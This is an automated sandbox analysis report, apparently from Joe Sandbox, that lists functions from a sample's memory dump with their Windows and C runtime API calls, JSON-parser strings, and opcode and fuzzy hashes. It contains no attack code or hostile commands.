                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _swprintf$___from_strstr_to_strchr__vswprintf_s_l
                                                                                    • String ID: %%.%ug
                                                                                    • API String ID: 3510402643-276279324
                                                                                    • Opcode ID: 59198b3ce1b2d1bbfd1c8726681299de357d2356a65fff3726aed2c3f63f0676
                                                                                    • Instruction ID: ea927ed6ceba5a9a914b43fa3c30b2b6084c75c774db187de01b91b0b7680e1a
                                                                                    • Opcode Fuzzy Hash: 59198b3ce1b2d1bbfd1c8726681299de357d2356a65fff3726aed2c3f63f0676
                                                                                    • Instruction Fuzzy Hash: 8F519EB1D0420CEBCF10EFE4E885AEEBBB5AF54300F048259E9057B241EB709949CB61
                                                                                    APIs
                                                                                      • Part of subcall function 00BBB540: task.LIBCPMTD ref: 00BBB5AC
                                                                                    • task.LIBCPMTD ref: 00BBB443
                                                                                    Strings
                                                                                    • expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00BBB4D6
                                                                                    • \, xrefs: 00BBB468
                                                                                    • u, xrefs: 00BBB486
                                                                                    • additional six characters expected to parse unicode surrogate pair., xrefs: 00BBB40C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: \$additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair$u
                                                                                    • API String ID: 1384045349-2216235094
                                                                                    • Opcode ID: ee5000b8580f98b99a0fdf1979376fa450969bdfe27454d9eee7a2f0f64eb027
                                                                                    • Instruction ID: 06612f1fc2ac28dd846d88599b1cf12dcc592283a03e91b5bc912cf65ab09bdc
                                                                                    • Opcode Fuzzy Hash: ee5000b8580f98b99a0fdf1979376fa450969bdfe27454d9eee7a2f0f64eb027
                                                                                    • Instruction Fuzzy Hash: FD51E875A04109EFCB08CF94D890EFEB7B5FF49310F2081A9E8259B295D774AA05DB60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 0-537541572
                                                                                    • Opcode ID: d9400d4a2ae76d3faf8c47789af9feb382ee4cbb53a70c22ab4f4b491cd023a0
                                                                                    • Instruction ID: 26e870ef46dd905efe9a0dddbe6ee9c5e3169867adde5965920f0dc2a39fb9c1
                                                                                    • Opcode Fuzzy Hash: d9400d4a2ae76d3faf8c47789af9feb382ee4cbb53a70c22ab4f4b491cd023a0
                                                                                    • Instruction Fuzzy Hash: A921E731E81220EBEB319B25DD85F1E7758AF01760F150A21ED27A72D0D632EE01DAE1
                                                                                    APIs
                                                                                      • Part of subcall function 00C156BC: _free.LIBCMT ref: 00C156E1
                                                                                    • _free.LIBCMT ref: 00C159BE
                                                                                      • Part of subcall function 00C0D859: RtlFreeHeap.NTDLL(00000000,00000000,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?), ref: 00C0D86F
                                                                                      • Part of subcall function 00C0D859: GetLastError.KERNEL32(?,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?,?), ref: 00C0D881
                                                                                    • _free.LIBCMT ref: 00C159C9
                                                                                    • _free.LIBCMT ref: 00C159D4
                                                                                    • _free.LIBCMT ref: 00C15A28
                                                                                    • _free.LIBCMT ref: 00C15A33
                                                                                    • _free.LIBCMT ref: 00C15A3E
                                                                                    • _free.LIBCMT ref: 00C15A49
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 972a98a7fd839b63507dc3b78452d3b7c6ee51e1fc223362a214e362c0fc8e57
                                                                                    • Instruction ID: a4ba460c3c538f4069f26a1d06d3c4082a4c2dc579d27a8e7326b205dffd20ca
                                                                                    • Opcode Fuzzy Hash: 972a98a7fd839b63507dc3b78452d3b7c6ee51e1fc223362a214e362c0fc8e57
                                                                                    • Instruction Fuzzy Hash: 30112CB1A51B04EAE620F7F0CC46FCF779C5F41700F804929F29A66196DA65A644BAD0
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00C1157E
                                                                                    • __fassign.LIBCMT ref: 00C11763
                                                                                    • __fassign.LIBCMT ref: 00C11780
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C117C8
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C11808
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C118B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                    • String ID:
                                                                                    • API String ID: 1735259414-0
                                                                                    • Opcode ID: 4fe5e88ef29b836f5501014bcb43c260a4d578a38607046e2034f1550f0a6b0c
                                                                                    • Instruction ID: d5bb96373033b0828768f21239eed574066282162354c17c3908b401a8f55a1a
                                                                                    • Opcode Fuzzy Hash: 4fe5e88ef29b836f5501014bcb43c260a4d578a38607046e2034f1550f0a6b0c
                                                                                    • Instruction Fuzzy Hash: 1CC1A075D002588FDB14CFE8C880AEDBBB9EF49310F28816AE955F7381D6359E86DB50
                                                                                    APIs
                                                                                      • Part of subcall function 00C07C5E: CloseHandle.KERNEL32(?,?,?,00C07D95,?,?,00B17A89,00000000), ref: 00C07C8F
                                                                                      • Part of subcall function 00C07C5E: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00C07D95,?,?,00B17A89,00000000), ref: 00C07CA5
                                                                                      • Part of subcall function 00C07C5E: ExitThread.KERNEL32 ref: 00C07CAE
                                                                                    • __allrem.LIBCMT ref: 00C07F1E
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C07F3A
                                                                                    • __allrem.LIBCMT ref: 00C07F51
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C07F6F
                                                                                    • __allrem.LIBCMT ref: 00C07F86
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C07FA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$ExitThread$CloseFreeHandleLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 1885649644-0
                                                                                    • Opcode ID: dc1f019d2059dae00d824fa73c3bdd8b078ac6c6b2662949e4e0d45165c2cc24
                                                                                    • Instruction ID: 50067d8e805a8836d9fb377a2c352f60899662e9b8c4336ca566b5a58e109e6e
                                                                                    • Opcode Fuzzy Hash: dc1f019d2059dae00d824fa73c3bdd8b078ac6c6b2662949e4e0d45165c2cc24
                                                                                    • Instruction Fuzzy Hash: 1E812972A04706AFE7249F79CC41B6AB3E9AF41724F248629F421D72C1EB70EE44D790
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: allocator
                                                                                    • String ID:
                                                                                    • API String ID: 3447690668-0
                                                                                    • Opcode ID: 678ce6a290f17b14c962b64782b82c58fd7407bde27ea5b252dd0bb4f763a219
                                                                                    • Instruction ID: d2d4fcaca7597c964b02af9f5c0731c54d47b2a4993d42bf717d4a21b72c3847
                                                                                    • Opcode Fuzzy Hash: 678ce6a290f17b14c962b64782b82c58fd7407bde27ea5b252dd0bb4f763a219
                                                                                    • Instruction Fuzzy Hash: DDA1B67460520A9BDB08DF58C491BAEBBF2EF49314F14C1ACF8499B352DA35ED45CB90
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00BF7A22
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00BF7AB0
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BF7B22
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00BF7B3C
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BF7B9F
                                                                                    • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00BF7BBC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$CompareInfoString
                                                                                    • String ID:
                                                                                    • API String ID: 2984826149-0
                                                                                    • Opcode ID: 4fa8df085d601f8536657fa2dd094f5fe4c7dab878306afffac012723a076162
                                                                                    • Instruction ID: e4b1c439f67bda2d1889e2add32669379918f3cc3d6c1b05475ca2705bb24e63
                                                                                    • Opcode Fuzzy Hash: 4fa8df085d601f8536657fa2dd094f5fe4c7dab878306afffac012723a076162
                                                                                    • Instruction Fuzzy Hash: F2717D7294824EAADF218FA4CC95EFE7BF6EF46310F2540D9EA01A7251DA358909C760
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BF77F6
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BF7861
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF787E
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BF78BD
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF791C
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BF793F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiStringWide
                                                                                    • String ID:
                                                                                    • API String ID: 2829165498-0
                                                                                    • Opcode ID: 063480f0cbd9f5a22170cae6e2d0027e874b3c490cbd5165e9de722cc2b2d826
                                                                                    • Instruction ID: e0a76fa65691f0107ab699ff22a54775df091f54b22e9032dd1b36a83793a415
                                                                                    • Opcode Fuzzy Hash: 063480f0cbd9f5a22170cae6e2d0027e874b3c490cbd5165e9de722cc2b2d826
                                                                                    • Instruction Fuzzy Hash: 8951AE7255421EBBEB205F65CC84FBE7BE9EB40750F1084E9FA15A7150DBB08C19CB90
                                                                                    APIs
                                                                                      • Part of subcall function 00BD3110: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BD3159
                                                                                      • Part of subcall function 00BD3110: task.LIBCPMTD ref: 00BD3200
                                                                                      • Part of subcall function 00BD3110: task.LIBCPMTD ref: 00BD3230
                                                                                    • task.LIBCPMTD ref: 00BD056F
                                                                                    • task.LIBCPMTD ref: 00BD0605
                                                                                    • task.LIBCPMTD ref: 00BD062C
                                                                                    • task.LIBCPMTD ref: 00BD063B
                                                                                    • task.LIBCPMTD ref: 00BD0663
                                                                                    • task.LIBCPMTD ref: 00BD0672
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task$Affinity::operator!=Concurrency::details::Hardware
                                                                                    • String ID:
                                                                                    • API String ID: 1350200053-0
                                                                                    • Opcode ID: 0990d588363916f3df1be19bdfbc0f9f0d8a45f12ee8aba644a6b27e7e456ba4
                                                                                    • Instruction ID: b5213c7a1d3296eda4bfb53384703f9926c714a67bc55d866fc950c92c30bd25
                                                                                    • Opcode Fuzzy Hash: 0990d588363916f3df1be19bdfbc0f9f0d8a45f12ee8aba644a6b27e7e456ba4
                                                                                    • Instruction Fuzzy Hash: 4F513071814148DFCB05EFA4C891BEEFBB4FF55314F44419AE4166B292EB346A09CF60
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00BC7A04,?), ref: 00BCC7EC
                                                                                    • GetCurrentProcess.KERNEL32(00BC7A04,00000000,?,?,?,00BC7A04,?), ref: 00BCC7F7
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,00BC7A04,?), ref: 00BCC7FE
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,00BC7A04,?), ref: 00BCC835
                                                                                    • GetFileType.KERNEL32(000000FF,?,?,?,00BC7A04,?), ref: 00BCC858
                                                                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00BCC8D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CurrentProcess$CreateDuplicateHandlePointerType
                                                                                    • String ID:
                                                                                    • API String ID: 3364526186-0
                                                                                    • Opcode ID: 862ef4d87d5f37580e3d9cc044251ca156f684e67e7fdf8204ec5a6fa012cf9b
                                                                                    • Instruction ID: 329b1622ec400132f819ab3ac66f1fffc3669682f5b3aa2d0636ba3af0c6be4e
                                                                                    • Opcode Fuzzy Hash: 862ef4d87d5f37580e3d9cc044251ca156f684e67e7fdf8204ec5a6fa012cf9b
                                                                                    • Instruction Fuzzy Hash: A05139B4A00349DFDB11CFA0C859BAEBBF1FB19300F108599E8156B380D7B59A85CFA1
                                                                                    APIs
                                                                                    • std::ios_base::good.LIBCPMTD ref: 00BBEC86
                                                                                      • Part of subcall function 00BBFDC0: std::bad_exception::bad_exception.LIBCMTD ref: 00BBFDCD
                                                                                    • task.LIBCPMTD ref: 00BBEC5D
                                                                                      • Part of subcall function 00BBE490: task.LIBCPMTD ref: 00BBE905
                                                                                      • Part of subcall function 00BBE490: task.LIBCPMTD ref: 00BBE920
                                                                                    Strings
                                                                                    • Syntax error: value, object or array expected., xrefs: 00BBEFB3
                                                                                    • Exceeded stackLimit in readValue()., xrefs: 00BBEC2D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task$std::bad_exception::bad_exceptionstd::ios_base::good
                                                                                    • String ID: Exceeded stackLimit in readValue().$Syntax error: value, object or array expected.
                                                                                    • API String ID: 212276442-359489996
                                                                                    • Opcode ID: 2901f57a192922c4ae5dacc04841a68ec35b1b2cdc35e8b601c2182c850b3a33
